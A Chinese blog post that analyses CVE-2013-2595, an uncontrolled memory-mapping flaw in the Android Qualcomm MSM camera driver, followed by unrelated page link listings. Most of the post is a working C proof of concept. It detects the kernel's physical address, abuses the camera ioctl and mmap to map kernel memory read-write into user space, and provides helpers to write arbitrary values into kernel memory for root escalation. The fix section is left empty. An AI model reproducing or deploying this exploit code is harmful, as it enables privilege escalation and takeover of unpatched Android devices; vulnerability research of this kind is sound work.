版权声明:本文为博主原创文章。未经博主同意不得转载。

https://blog.csdn.net/hu3167343/article/details/34434235

/*

本文章由 莫灰灰 编写,转载请注明出处。  

作者:莫灰灰    邮箱:
minzhenfei@163.com

*/

1漏洞描写叙述

漏洞的产生主要是由于摄像头驱动提供了几个用于用户空间调用的接口。

用户空间能够使用诸如ioctl或者mmap这种系统调用函数就能对摄像头驱动产生影响。黑客能够非常easy的使用事先构造好的參数将物理内存map到用户空间,并提升权限。

2.影响设备

绝大多数使用2013年5月1日之前的Linux内核安卓系统

3.PoC

/*

 *

 * This program is free software: you can redistribute it and/or modify

 * it under the terms of the GNU General Public License as published by

 * the Free Software Foundation, either version 3 of the License, or

 * (at your option) any later version.

 *

 * This program is distributed in the hope that it will be useful,

 * but WITHOUT ANY WARRANTY; without even the implied warranty of

 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the

 * GNU General Public License for more details.

 *

 * You should have received a copy of the GNU General Public License

 * along with this program.  If not, see <http://www.gnu.org/licenses/>.

 *

 */

#include <stdint.h>

#include <stdio.h>

#include <errno.h>

#include <sys/types.h>

#include <sys/stat.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <sys/mman.h>

#include <linux/fb.h>

#include <string.h>

#include "msm_cameraconfig.h"

#define MSM_CAM_IOCTL_MAGIC 'm'

struct msm_mem_map_info {

    uint32_t cookie;

    uint32_t length;

    uint32_t mem_type;

};

#define MSM_CAM_IOCTL_SET_MEM_MAP_INFO \

        _IOR(MSM_CAM_IOCTL_MAGIC, 41, struct msm_mem_map_info *)

#define MSM_MEM_MMAP 0

#define KERNEL_VIRT_ADDRESS     0xc0000000

#define MAPPED_BASE             0x20000000

#define KERNEL_SIZE             0x02000000

static bool kernel_phys_offset_initialized = false;

static unsigned long kernel_phys_offset = 0;

static int

get_cpu_implementer(void)

{

  FILE *fp;

  char name[BUFSIZ];

  char value[BUFSIZ];

  int ret;

  long int implementer = 0;

  fp = fopen("/proc/cpuinfo", "r");

  if (!fp) {

    printf("Failed to open /proc/cpuinfo due to %s.", strerror(errno));

    return 0;

  }

  while ((ret = fscanf(fp, "%[^:]: %[^\n]\n", name, value)) != EOF) {

    if (!strncmp(name, "CPU implementer", 15)) {

      implementer = strtol(value, NULL, 16);

      break;

    }

  }

  fclose(fp);

  return implementer;

}

static unsigned long int

detect_kernel_phys_address_from_cpuinfo(void)

{

  int implementer;

  implementer = get_cpu_implementer();

  switch (implementer) {

  case 'Q':   // 0x51

    return 0x80200000;

  }

  return 0x80000000;

}

static unsigned long int

get_system_ram_address_from_iomem(void)

{

  FILE *fp;

  char name[BUFSIZ];

  void *start_address, *end_address;

  void *system_ram_address = NULL;

  int ret;

  fp = fopen("/proc/iomem", "r");

  if (!fp) {

    printf("Failed to open /proc/iomem due to %s.\n", strerror(errno));

    return false;

  }

  while ((ret = fscanf(fp, "%p-%p : %[^\n]", &start_address, &end_address, name)) != EOF) {

    if (!strcmp(name, "System RAM")) {

      system_ram_address = start_address;

      continue;

    }

    if (!strncmp(name, "Kernel", 6)) {

      break;

    }

  }

  fclose(fp);

  return (unsigned long int)system_ram_address;

}

static bool

detect_kernel_phys_parameters(void)

{

  unsigned long int system_ram_address;

  system_ram_address = get_system_ram_address_from_iomem();

  if (!system_ram_address) {

    system_ram_address = detect_kernel_phys_address_from_cpuinfo();

  }

  kernel_phys_offset_initialized = true;

  kernel_phys_offset = system_ram_address;

  return true;

}

void *

msm_cameraconfig_convert_to_mmaped_address(void *address, void *mmap_base_address)

{

  return mmap_base_address + (uint32_t)address - KERNEL_VIRT_ADDRESS;

}

bool

msm_cameraconfig_write_value_at_address(unsigned long int address, int value)

{

  void *mmap_address = NULL;

  int *write_address;

  int fd_video;

  int fd_config;

  mmap_address = msm_cameraconfig_mmap(&fd_video, &fd_config);

  if (mmap_address == MAP_FAILED) {

    return false;

  }

  write_address = msm_cameraconfig_convert_to_mmaped_address((void*)address, mmap_address);

  *write_address = value;

  msm_cameraconfig_munmap(mmap_address, fd_video, fd_config);

  return true;

}

bool

msm_cameraconfig_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data),

                   void *user_data)

{

  void *mapped_address = NULL;

  int fd_video;

  int fd_config;

  bool success;

  mapped_address = msm_cameraconfig_mmap(&fd_video, &fd_config);

  if (mapped_address == MAP_FAILED) {

    return false;

  }

  success = exploit_callback(mapped_address, user_data);

  msm_cameraconfig_munmap(mapped_address, fd_video, fd_config);

  return success;

}

void

msm_cameraconfig_set_kernel_phys_offset(int offset)

{

  kernel_phys_offset_initialized = true;

  kernel_phys_offset = offset;

}

void *

msm_cameraconfig_mmap(int *fd_video, int *fd_config)

{

  struct msm_mem_map_info args;

  void *mapped_address;

  if (!kernel_phys_offset_initialized && !detect_kernel_phys_parameters()) {

     printf("This machine can not use msm_cameraconfig exploit.\n");

     return MAP_FAILED;

  }

  *fd_video = open("/dev/video0", O_RDWR);

  if (*fd_video < 0) {

    goto error_exit;

  }

  *fd_config = open("/dev/msm_camera/config0", O_RDWR);

  if (*fd_config < 0) {

    goto error_exit;

  }

  args.cookie = kernel_phys_offset;

  args.length = KERNEL_SIZE;

  args.mem_type = MSM_MEM_MMAP;

  if (ioctl(*fd_config, MSM_CAM_IOCTL_SET_MEM_MAP_INFO, &args) < 0) {

    goto error_exit;

  }

  mapped_address = mmap((void *)MAPPED_BASE, KERNEL_SIZE, PROT_READ | PROT_WRITE,

                        MAP_SHARED, *fd_config, kernel_phys_offset);

  if (mapped_address == MAP_FAILED) {

    goto error_exit;

  }

  return mapped_address;

error_exit:

  if (*fd_config >= 0) {

    close(*fd_config);

    *fd_config = -1;

  }

  if (*fd_video >= 0) {

    close(*fd_video);

    *fd_video = -1;

  }

  return MAP_FAILED;

}

int

msm_cameraconfig_munmap(void *address, int fd_video, int fd_config)

{

  if (address != MAP_FAILED) {

    int ret;

    ret = munmap(address, KERNEL_SIZE);

    if (ret < 0) {

      printf("Failed to munmap due to %s\n", strerror(errno));

      return ret;

    }

  }

  close(fd_config);

  close(fd_video);

  return 0;

}

4.漏洞修复

5.总结

1.漏洞的利用事实上和Root exploit on Exynos(CVE-2012-6422)几乎相同。仅仅是map物理内存的方法不同罢了。

2.其次,这个漏洞的补丁也非常奇特,仅仅是简单的把相关漏洞代码删掉了。

预计是胡乱抄代码模板导致的漏洞,哈哈。

Uncontrolled memory mapping in camera driver (CVE-2013-2595)的更多相关文章

  1. The web application registered the JDBC driver * but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.

    最近使用了最新版的tomcat9,使用jdbc链接mysql数据库.关闭tomcat过程中出现警告 13-Sep-2017 22:22:54.369 WARNING [main] org.apache ...

  2. The web application [ ] registered the JDBC driver [net.sourceforge.jtds.jdbc.Driver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver

    出现以下错误时,我找了很多方法,都未解决,网上有很多,最后我实在无奈,怀疑会不会是Tomcat的原因,更换了一个版本之后就好了.The web application [ ] registered t ...

  3. registered the JDBC driver [com.mysql.jdbc.Driver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.

    问题是tomcat的版本问题,tomcat新检测机制导致的这个问题,换版本可以解决问题,但不建议这么做,租用服务器不是你说换就换的.其实问题根源是BasicDataSource,BasicDataSo ...

  4. 解决:The web application [] registered the JDBC driver [] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDBC Driver has been forcibly unregistered.

    问题描述 在将Spring Boot程序打包生成的war包部署到Tomcat后,启动Tomcat时总是报错,但是直接在IDEA中启动Application或者用"java -jar" ...

  5. msm8974 camera driver添加新摄像头kernel hal修改

    添加一款新摄像头流程 1添加sensor kernel driver, 主要实现上电.rst.pwd.mclk等power setting,sensor prob & sensor  i2c ...

  6. Visual Studio 2013 新功能 Memory Dump 分析器

    本文为 Dennis Gao 原创技术文章,发表于博客园博客,未经作者本人允许禁止任何形式的转载. TechEd2013 发现新功能 12月5日和6日,在国家会议中心参加了微软的 TechEd2013 ...

  7. 严重: The web application [] registered the JDBC driver [com.microsoft.sqlserver.jdbc.SQLServerDriver] but failed to unregister it when the web application was stopped. To prevent a memory leak, the JDB

    idea项目启动报如下错误, 网上的方法都试了都没用, 一直没解决, 干掉项目, 重新从svn检出就好了...坑 啊 Root WebApplicationContext: initializatio ...

  8. check camera and driver

    1. How to check $ ls /dev/video* /dev/video0 /dev/video1 /dev/video2 /dev/video3 if not, U should ch ...

  9. Tomcat运行一段时间后,自动停止关闭,To prevent a memory leak,Druid 数据库连接自动关闭, the JDBC Driver has been forcibly unregistered.

    1. Tomcat 错误日志 tail -100f tomcat9/logs/catalina.out 21-Sep-2017 23:05:39.301 INFO [Thread-5] org.apa ...

随机推荐

  1. 弹出框插件——dialog

    基于jquery和dot.js弹出框插件,兼容IE6+等其他浏览器. 思想:弹出框元素插入body节点中,并在页面垂直居中显示(fixed定位),触发确定和关闭事件绑定. 注意ie6包含两个问题:一. ...

  2. 3. CMake 系列 - 分模块编译&安装项目

    目录 1. 项目目录结构 2. 相关代码 2.1 add 模块 2.2 sub 模块 2.3 测试模块 2.4 顶层 CMakeLists.txt 3. 编译 & 安装 4. 项目安装基本语法 ...

  3. JQuery Easyui引入easyui-lang-zh_CN.js后出现乱码的问题解决方法

    最近使用Easyui做项目,发现引入easyui-lang-zh_CN.js单元后页面会出现乱码,无论设置<meta>.还是Response都不能解决问题.用记事本打开easyui-lan ...

  4. electron安装+运行+打包成桌面应用+打包成安装文件+开机自启动

    1.初始化node项目,生成package.json文件 npm init 2.安装electron,并保存为开发依赖项 npm install electron -D 3.根目录下新建index.j ...

  5. [TensorBoard] Name & Variable scope

    TF有两个scope, 一个是name_scope一个是variable_scope 第一个程序: with tf.name_scope("hello") as name_scop ...

  6. IOS开发之--iPhone XR,iPhone XS Max适配

    因为iPhone X和iPhone XS的尺寸比是一样的,只需要把这两张图片补上就行. 具体原理性的东西就多说了,因为iPhoneX系列都一样,本文只说明一下具体怎么做,要适配屏幕,首先得让他以正确的 ...

  7. react列表数据显示

    react的列表数据一般是用map循环显示的. 使用map注意:map的回调函数为箭头函数时,后面如果加大括号(箭头函数常规编写),必须要有return才可以,如果箭头函数后面没有大括号(箭头函数简写 ...

  8. xrdp完美实现Windows远程访问Ubuntu 16.04

    前言: 在很多场景下,我们需要远程连接到Linux服务器(本文是Ubuntu),传统的连接主要分为两种. 第一种:通过SSH服务(使用xshell等工具)来远程访问,编写终端命令,不过这个是无界面的, ...

  9. [原]openstack-kilo--issue(十一)Failed connect to 169.254.169.254:80; No route to host

    本博客已经添加"打赏"功能,"打赏"位置位于右边栏红色框中,感谢您赞助的咖啡. # curl http://169.254.169.254/latest/use ...

  10. NIO相关概念之Selector

    选择器(selector): 选择器管理者一个被注册的通道的集合信息和它们的就绪状态.通道是和选择器一起被注册的,并且使用选择器来更新通道的就绪状态,当这么做的时候,可以选择被激发的线程挂起,直到有就 ...